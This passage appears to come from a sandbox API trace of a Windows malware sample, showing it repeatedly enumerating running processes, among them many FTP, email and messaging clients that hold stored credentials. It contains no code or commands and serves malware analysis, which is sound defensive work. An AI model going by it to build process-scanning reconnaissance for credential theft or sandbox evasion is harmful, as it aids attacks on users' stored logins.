lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0162.699] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.701] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0162.703] CloseHandle (hObject=0x1cec) returned 1 [0162.703] Sleep (dwMilliseconds=0x64) [0162.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1be0 [0162.851] Process32First (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.853] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.855] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.856] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.858] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.860] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.861] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.863] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.864] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.866] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.867] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.869] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.892] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.999] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.001] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.003] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.004] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.006] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.007] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.009] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.010] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0163.012] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.013] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0163.016] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.018] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0163.019] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0163.022] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0163.024] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0163.026] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0163.027] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0163.029] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.030] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.032] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0163.033] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.069] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.071] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.073] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.075] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0163.077] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0163.079] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0163.080] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0163.082] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0163.083] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0163.086] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0163.088] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0163.089] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0163.092] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0163.094] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0163.096] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0163.098] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0163.100] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0163.103] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0163.105] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0163.107] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0163.112] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0163.114] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0163.117] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0163.119] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0163.122] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0163.124] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0163.126] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0163.129] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0163.131] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0163.135] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0163.138] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0163.141] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0163.144] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0163.149] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0163.151] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0163.153] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0163.155] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0163.157] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0163.159] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0163.161] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0163.163] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0163.165] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0163.166] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0163.168] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0163.171] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0163.173] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0163.176] Process32Next (in: hSnapshot=0x1be0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0163.178] Process32Next (in: 